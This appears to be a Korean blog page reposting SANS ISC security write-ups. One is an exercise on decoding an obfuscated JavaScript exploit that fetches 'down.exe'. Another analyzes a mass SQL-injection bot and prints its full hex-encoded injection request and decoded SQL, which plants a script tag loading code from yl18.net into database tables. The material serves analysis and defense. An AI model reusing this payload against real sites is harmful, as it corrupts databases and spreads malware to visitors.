'분류 전체보기'에 해당되는 글 239건
- 2009.05.21 victim.kr 있을까?
- 2009.05.21 GIFAR
- 2009.05.17 Evading Web XSS Filters through Word in Enterprise Web Applications
- 2009.05.17 자바스크립트 설명
- 2009.05.15 MUA 변경 사항
- 2009.05.10 [09년 보성 다향제 일정
- 2009.05.03 운전면허 - 기능 연습
- 2009.04.30 Decoding Javascript - Exercise
- 2009.04.30 Mass exploits with SQL Injection
- 2009.04.28 Connecting The Dots: Downadup/Conficker Variants
※ 본 행사 일정 및 프로그램은 사정에 따라 변경될 수 있습니다. |
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
출 처 : http://dahyang.boseong.go.kr/dahyang2005/ |
This page was put together to accompany my SANS ISC diary entry on "Javascript Decoding" (see https://isc2.sans.org/diary.html?storyid=2268) and the corresponding example page. If you haven't done so yet, please read the diary first.
Warning! The links on this page contain exploit code. Mind you, exploit code which has been changed very slightly and should not be harmful anymore, but it *is* exploit code, and as such it might possibly trigger your anti-virus. What I'm aiming at: Work through the examples on this page from a LAB PC which is not connected to your production network. And don't complain to me or SANS ISC if clicking on anything on this page makes your computer turn out scrambled instead of sunny side up.
|
The Starting Point |
The original, encoded exploit page was found after unraveling a long set of exploits and IFRAMES. I picked this one as example because it shows an encoding technique that is not in all that widespread use: Download the original file if you want to reproduce the next steps on your own! Do a right-click "save link as", or you'll end up with an empty page. The "function" calls within the file were renamed to "funkyon", and the two "eval" statements were renamed into a more fitting "evil" to keep them from triggering by accident. Note:You'll have to change "funkyon" back to "function", and "evil" back to "eval" in the file (once downloaded) if you want to play with the file! |
Step #1 - Applying the "Monkey Wrench" |
The above code is clearly too messy to try to use the Perl-Fu method. Not knowing really what is hidden inside, and leery of the many bad guys who have started to seed their spoits with a </textarea> tag to break out of the "Liston Method" textarea jail, this leaves the "Monkey Wrench" as a good try. A quick edit replaces the first "eval" with a "print", and then: daniel@debian:~$ js 0614.txt > stage1.txtwhich results in something like this: |
Step #2 - Unwrapping the Octal code" |
The resulting block shown above is still encoded, but in a far easier format. You might notice that the code only uses figures between 0 and 7, which is a tell-tale indicator that the numbers are encoded in the octal numbering system. To unwrap this block you can easily use the "Monkey Wrench" again, all you have to do is replace the initial "eval" with a "print" and feed the code block into "js".For didactical :) purposes, I'm going to use the Perl-Fu method on this stage, though: daniel@debian:~$ cat stage1.txt | perl -pe 's/\\(\d+)/chr(oct($1))/ge'does the trick. oct() converts the octal number to decimal, and chr() turns the decimal ascii code into a printable character. The result is something like this: The exploit obviously tries to download and run "down.exe" off the same site. |
출 처 : http://handlers.sans.org/dwesemann/decode/exercise.html
It turned out that there is an automated script or a bot exploiting SQL injection attacks in vulnerable web applications. I remembered that I saw the very same attack appearing back in November last year but it was not this wide spread – it appears that the attacker improved the crawling/attacking function of his bot so he managed to compromise more web sites.
The attack back from November 2007 was almost exactly the same as the current one, but the SQL statement appears to be a bit improved. One of the logs that we received back in November is shown below:
GET /home/site_content_3.asp
s=290';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x6400650063006C0061007200650
0200040006D00200076006100720063006800610072002800380030003000300029003B007300650
07400200040006D003D00270027003B00730065006C00650063007400200040006D003D0040006D0
02B0027007500700064006100740065005B0027002B0061002E006E0061006D0065002B0027005D0
07300650074005B0027002B0062002E006E0061006D0065002B0027005D003D00720074007200690
06D00280063006F006E007600650072007400280076006100720063006800610072002C0027002B0
062002E006E0061006D0065002B002700290029002B00270027003C0073006300720069007000740
020007300720063003D00220068007400740070003A002F002F0079006C00310038002E006E00650
074002F0030002E006A00730022003E003C002F007300630072006900700074003E00270027003B0
027002000660072006F006D002000640062006F002E007300790073006F0062006A0065006300740
07300200061002C00640062006F002E0073007900730063006F006C0075006D006E0073002000620
02C00640062006F002E0073007900730074007900700065007300200063002000770068006500720
06500200061002E00690064003D0062002E0069006400200061006E006400200061002E007800740
07900700065003D0027005500270061006E006400200062002E00780074007900700065003D00630
02E0078007400790070006500200061006E006400200063002E006E0061006D0065003D002700760
061007200630068006100720027003B00730065007400200040006D003D005200450056004500520
053004500280040006D0029003B00730065007400200040006D003D0073007500620073007400720
069006E006700280040006D002C0050004100540049004E004400450058002800270025003B00250
027002C0040006D0029002C00380030003000300029003B00730065007400200040006D003D00520
0450056004500520053004500280040006D0029003B006500780065006300280040006D0029003B0
0%20AS%20NVARCHAR(4000));EXEC(@S);--
As you can see, we can't tell much what's going on here. The attackers were smart and decided to obfuscate the attack by using the CAST statement. The CAST statement explicitly converts one data type to another. So, the attackers CAST the big input value as "@S" and then execute it. In this example, the site_content_3.asp script is vulnerable to SQL injection (notice the ' character after s=290, which is an input parameter for the site_content_3.asp script).
Back to the CAST statement. We can decode this simply with perl, we just need to copy the CAST content into a separate line and do something like this:
$ perl -pe 's/(..)00/chr(hex($1))/ge' < input > output
The output file will contain the decoded SQL statement:
declare @m varchar(8000);set @m='';select @m=@m+'update['+a.name+']set['+b.name+']=rtrim(convert(varchar,'+b.name+'))+''<script src="http://yl18.net/0.js"></script>'';'
from dbo.sysobjects a,dbo.syscolumns b,dbo.systypes c where a.id=b.id and a.xtype='U'and b.xtype=c.xtype and c.name='varchar';
set @m=REVERSE(@m);set @m=substring(@m,PATINDEX('%;%',@m),8000);set @m=REVERSE(@m);exec(@m);
And here we can see exactly what's going on. This SQL statement takes all rows from the sysobjects table with type U (user table). It then cycles through those objects and matches those that with type „varchar“. Finally, for every such object it executes an update statement which results in appending the code shown above pointing to the yl18.net site.
The attack with the uc8010.com site was practically the same with a bit better SQL – Ryan Barnett posted an example of this attack at http://www.modsecurity.org/blog/
As some people noticed, almost all affected web sites are running IIS and MS SQL server. This makes sense since the SQL statement in the attack will work only on MS SQL servers and there aren't that many web sites running Apache on Windows. That being said, I have no doubt that the bad guys will expand their bot (if they haven't already) so it starts attacking PHP+MySQL web sites.
This is another example that points to issues with development of web applications (see the OWASP top ten vulnerability list for 2007 – injection flaws are on the second place http://www.owasp.org/index.php/Top_10_2007-A2#Protection). One could also protect against attacks such as this one with a reverse proxy/web application firewall in front of the web server. However, be aware that this is just a temporary fix – as we saw in this example the bad guys are pretty good in evading detection, as they did with the CAST statement (sure, you can block on CAST but be aware that there are other obfuscation ways).